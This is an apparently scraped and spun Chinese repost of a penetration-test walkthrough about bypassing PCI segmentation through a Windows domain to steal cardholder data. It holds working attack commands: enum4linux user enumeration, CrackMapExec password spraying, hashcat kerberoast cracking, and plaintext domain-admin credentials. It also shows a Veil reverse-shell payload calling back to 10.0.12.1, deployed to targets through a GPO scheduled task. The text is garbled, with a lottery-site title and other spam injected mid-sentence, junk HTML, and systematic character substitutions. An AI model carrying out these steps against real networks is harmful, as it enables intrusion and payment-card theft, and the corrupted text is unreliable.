<small id='C4X7v'></small> <noframes id='80pO'>

  • <tfoot id='CpY3AFPTQ'></tfoot>

      <legend id='vQUET6'><style id='stlc'><dir id='glUztin7'><q id='t2y3XOf9D'></q></dir></style></legend>
      <i id='breYK9xaT'><tr id='Mge1GRi4v'><dt id='C5z7wkAu'><q id='BQZ2CIo'><span id='Vw0PG'><b id='qaG764chjV'><form id='DQ2Y7z4O'><ins id='aijCtI'></ins><ul id='cY3Ew0Aa'></ul><sub id='VOXoLUYpH'></sub></form><legend id='eOPRth4D3r'></legend><bdo id='3PZ1kziIA'><pre id='m9HWzx'><center id='19FgM'></center></pre></bdo></b><th id='z1g6UOb'></th></span></q></dt></tr></i><div id='bcFa'><tfoot id='VD0Mz6QRvq'></tfoot><dl id='F6tr1A'><fieldset id='fmNSxUkC'></fieldset></dl></div>

          <bdo id='MVabhT0'></bdo><ul id='JqNM'></ul>

          1. <li id='HzVc2L4'></li>
            登陆

            章鱼彩票电脑-看我怎么运用Windows域绕过防火墙获取持卡人数据的拜访权限

            admin 2019-06-04 213人围观 ,发现0个评论

            写在前面的话

            在这篇文章中,咱们将介绍怎么绕过防火墙体系,并获取到持卡人数据环境(CDE)的拜访权。最终方针:提取方针用户的信用卡数据。

            假如你需求在你的网络中存储、传输或处理信用卡数据的话,那么信用卡数据安全就必须要得到有用保证。依据PCI数据安全规范(PCI-DSS),持卡人数据能够直接在内部网络中传输和发送,条件是网络体系已施行了网络切割,而这种网络规模(区分持卡人数据环境跟其他网络)的界说一般都是经过防火墙来完结的。

            为章鱼彩票电脑-看我怎么运用Windows域绕过防火墙获取持卡人数据的拜访权限了维护客户的秘要数据,咱们需求对网络的完结细节进行修正。假定公司具有一个十分大型的网络体系,悉数的地址都在10.0.0.0/8这个规模内。持卡人数据则需求独自区分至192.168.0.0/16这个规模,并海融易官网经过防火墙进章鱼彩票电脑-看我怎么运用Windows域绕过防火墙获取持卡人数据的拜访权限行阻隔。

            注:CDE一般由呼叫中心(担任处理电话订单)和操作人员(担任将付出信息填写进Web表但)组成。

            此次测验仅仅一次内部测验,因而咱们直接衔接至公司的内部作业网络(10.0.0.0/8地址规模)。从这个地址运用ping指令和端口扫描功用来扫描CDE环境:

            Ping扫描基本上相当于直接运转ping指令,但nmap能够“一键式”扫描整个IP段。“hosts up”是第二个指令的输出,由于咱们添加了“-Pn”参数来判别是否是榜首次pin章鱼彩票电脑-看我怎么运用Windows域绕过防火墙获取持卡人数据的拜访权限g,因而nmap将会陈述当时规模内一切“up”的主机。

            因而,除非布置了防火墙规矩来绕过缝隙,或防火墙运用了弱暗码,不然这种方法的作用是不会抱负的。因而,咱们榜首不要做的便是怎么经过获取域办理员权限来操控活动目录。

            怎么变成域办理员?

            在咱们的场景中,咱章鱼彩票电脑-看我怎么运用Windows域绕过防火墙获取持卡人数据的拜访权限们挑选运用kerberoast来操控域。侵略活动目录的榜首步,一般需求获取恣意用户账号的拜访权,只需咱们能够经过域操控器的认证就能够了。在Windows中,一切的账号都能经过域操控器的认证,即便它们没有权限来做实践的作业。也便是说,最低权限的账户,只需登录完结之后并输入正确的暗码,它就能够经过验证。

            在这名用户的站点上,没有在域操控器中启用会话。因而,咱们的域操控器为10.0.12.100,“PETER”。咱们能够运用enum4linux之类的功用依据来枚举出用户列表,并获取到域中每一位用户的用户名:

            $ enum4linux -R 1000-50000 10.0.12.100|tee enum4linux.txt

            拿到用户列表之后,咱们就能够对其进行解析处理了:

            $ cat enum4linux.txt | grep '(LocalUser)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed's/MACFARLANE\\//g'

            这个网络十分巨大,有超越25000个活动用户,不过我运用grep进行了简略的用户挑选,足以演示咱们的进犯操作了。

            现在,拿到包括用户列表的文本文件后,咱们就能够运用CrackMapExec之类的东西来猜想用户暗码了。这儿咱们猜想方针账号的暗码是否为“Password1”:

            $ cme smb 10.0.12.100 -u users.txt -pPassword1

            假如咱们想要持续猜解,则需求指定“–continue-on-success”参数:

            拿到这个用户账号之后,咱们就能够查询活动目录,并获取服务账号列表了。服务账号便是针对服务运转的用户账号,比如说Microsoft章鱼彩票电脑-看我怎么运用Windows域绕过防火墙获取持卡人数据的拜访权限 SQL Server等等,它们需求在特定用户账号环境中运转。活动目录的Kerberos认证体系能够用来供给拜访权限,因而活动目录会供给一个“服务令牌”来运转用户进行认证。

            经过从域操控器恳求Kerberos服务账号列表,咱们还能够得到每一个账号的“服务令牌”。这个服务令牌运用了服务账号的暗码进行加密。所以,假如咱们破解暗码,咱们就能够运用这个账号,而这种账号一般都是高权限账号:

            咱们能够看到,其间一个账号为域办理组成员,所以咱们能够直接破解它:

            $ hashcat -m 13100 --potfile-disableSPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

            Hashcat运转之后,咱们就拿到了明文暗码:

            这是一个活动账号,咱们能够再次运用CrackMapExec:

            $ cme smb 10.0.12.100 -u redrum -p'murder1!'

            十分好,咱们拿到了域操控器的办理员账号!

            现在,尽管咱们不能直接拜访方针设备,但咱们能够经过活动目录域来让域操控器协助咱们跟方针设备进行交互。咱们的方针章鱼彩票电脑-看我怎么运用Windows域绕过防火墙获取持卡人数据的拜访权限是在CDE中经过呼叫中心操控同一活动目录中的其他计算机。为此,咱们还需求深化了解组战略方针(GPO)。

            GPO答应将各种规模等级的设置应用于用户和计算机,它能够以不同规模等级操控域中的计算机。客户GPO的许多功用都适用于一致办理安排中的IT设置。例如,一致设置暗码战略,或许一致设置为用户桌面显现哪些图标(例如,翻开公司网站的快捷方法)。而有一个GPO能够运转微软中的“计划使命”,这正是咱们所需求的。

            这儿我创立了一个需求在方针机器中运转的脚本,让它们衔接回咱们的机器。以下是具体步骤:

            1.生成payload。这儿咱们运用了Veil Evasion。咱们的IP地址是10.0.12.1,因而咱们设置回连到这个地址:

            $ veil -t EVASION -p 22 --ip 10.0.12.1--port 8755 -o pci_shell

            2.运用咱们从kerberoasting取得的凭证,经过远程桌面协议(RDP)登录到域操控器。

            3.在活动目录中找到CDE。依据咱们对方针的了解,他们的呼叫中心在2楼作业。经过阅读目录,咱们定位到一个特别的姓名:

            4.将咱们用Veil制造的歹意脚本放入文件夹,然后在域操控器上进行同享。在同享和目录上设置权限,答应一切域用户读取:

            5.创立GPO战略:

            6.在修改这个新的GPO时,点击“计划使命”,并创立新的“即时计划使命”:

            7.创立指向同享歹意脚本的使命。一起在common下设置”Run in logged-on user’s securitycontext”:

            等候顷刻后,状况如下所示:

            没错,便是咱们要的付出卡数据:

            浸透作业现在已悉数完结!

            *参阅来历:markitzeroday,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

            声明:该文观念仅代表作者自己,搜狐号系信息发布渠道,搜狐仅供给信息存储空间服务。
            请关注微信公众号
            微信二维码
            不容错过
            Powered By Z-BlogPHP